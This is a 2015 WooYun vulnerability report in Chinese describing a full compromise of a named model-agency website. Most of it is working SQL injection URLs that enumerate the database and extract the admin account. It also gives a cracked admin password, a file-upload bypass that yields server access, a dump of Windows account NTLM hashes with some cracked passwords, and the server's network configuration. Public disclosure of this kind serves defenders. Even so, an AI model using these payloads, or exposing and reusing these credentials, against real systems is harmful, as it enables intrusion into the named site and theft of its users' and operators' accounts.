当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119997

漏洞标题:中国模特网sql注入到服务器权限

相关厂商:中国模特网

漏洞作者: 路人甲

提交时间:2015-06-12 15:51

修复时间:2015-07-27 15:52

公开时间:2015-07-27 15:52

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上去就看见已经是被搞过了

详细说明:

http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select @@version) or '1'='1-b,-1,-1,-1,-1,-1,-1
user()
@@version
db_name()
@@servername
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select is_srvrolemember('db_owner')
and 1=(select is_srvrolemember('public')
爆数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select name from master.dbo.sysdatabases where dbid=1) or '1'='1-b,-1,-1,-1,-1,-1,-1
当前数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select db_name()) or '1'='1-b,-1,-1,-1,-1,-1,-1
------> chinaeve
报表:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 table_name from information_schema.tables where table_name not in(select top 1 table_name from information_schema.tables)) or '1'='1-b,-1,-1,-1,-1,-1,-1
tb_productType
tb_purchase
tb_Schedul
img
tb_Member
tb_Model_Data
tb_CompanyAccount1
tb_CompanyAccount
tb_Sysadmin
爆字段:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 column_name from information_schema.columns where table_name='tb_Sysadmin' and column_name not in(select top 0 column_name from information_schema.columns where table_name='tb_Sysadmin' order by column_name) order by column_name) or '1'='1-b,-1,-1,-1,-1,-1,-1
爆账号密码
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminpwd from tb_sysadmin where adminname='admin' order by SysadminID ) or '1'='1-b,-1,-1,-1,-1,-1,-1
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminname from tb_sysadmin order by SysadminID) or '1'='1-b,-1,-1,-1,-1,-1,-1
admin
94F233EA56EF21D9D740CC9768426935909EDED6 :zaochenxinglai
进管理员后台,新闻管理 上传图片 传asp;.jpg 失效,传php;.jpg 成功

漏洞证明:

sql注入:

AMQKVDD}5`PY30YRLO`VQFM.png


服务器:
--------------------------------------------- BEGIN DUMP --------------------------------------------
$ling:1016:400C37CBEF065246AAD3B435B51404EE:C019ED4B76D3C0977F9C7DC3DF4D92CD::: ling00
temp32:1015:D8FF1608057CBEDE87C394D748EF4541:F1073D2E4FBDC3EE1AB101B0719B2D1C:::
ASPNET:1007:0F2D1070F42921E425BD5221A9F890FF:DDEE1B75ECDFF6AE1436A5CB8A919F5F:::
jimmytang:1006:7FC4B6C8DA62B8F338F6DFE44B86ABD2:93705785F93C7C479706DC236F1701A3::: [email protected]
IWAM_CHINABTTE:1004:E4A8F92A9A0BD42966BC99C4F93A3B6B:32C9D47775A26FAB70DBF218AD7F88D7:::
IUSR_CHINABTTE:1003:0E638D4613747EBC90B8329CAC31C7A8:1715EB5F6C63425060D0AE04FA69846F:::
SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:885B21C3D352F3D4C0C864A8A9A43E59:::
y)9z$5!7c:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:2305D83F431CA9EB758FC8024D28E81B:3DAE2DB48E76E834441F1702DC08F521::: chuanmei20E
---------------------------------------------- END DUMP ---------------------------------------------
Connection-specific DNS Suffix . : |
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection |
Physical Address. . . . . . . . . : 00-50-56-A2-62-7F |
DHCP Enabled. . . . . . . . . . . : No |
IP Address. . . . . . . . . . . . : 118.244.173.12 |
Subnet Mask . . . . . . . . . . . : 255.255.224.0 |
Default Gateway . . . . . . . . . : 118.244.160.1 |
DNS Servers . . . . . . . . . . . : 211.147.6.3 |
8.8.8.8 |
NetBIOS over Tcpip. . . . . . . . : Disabled |

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝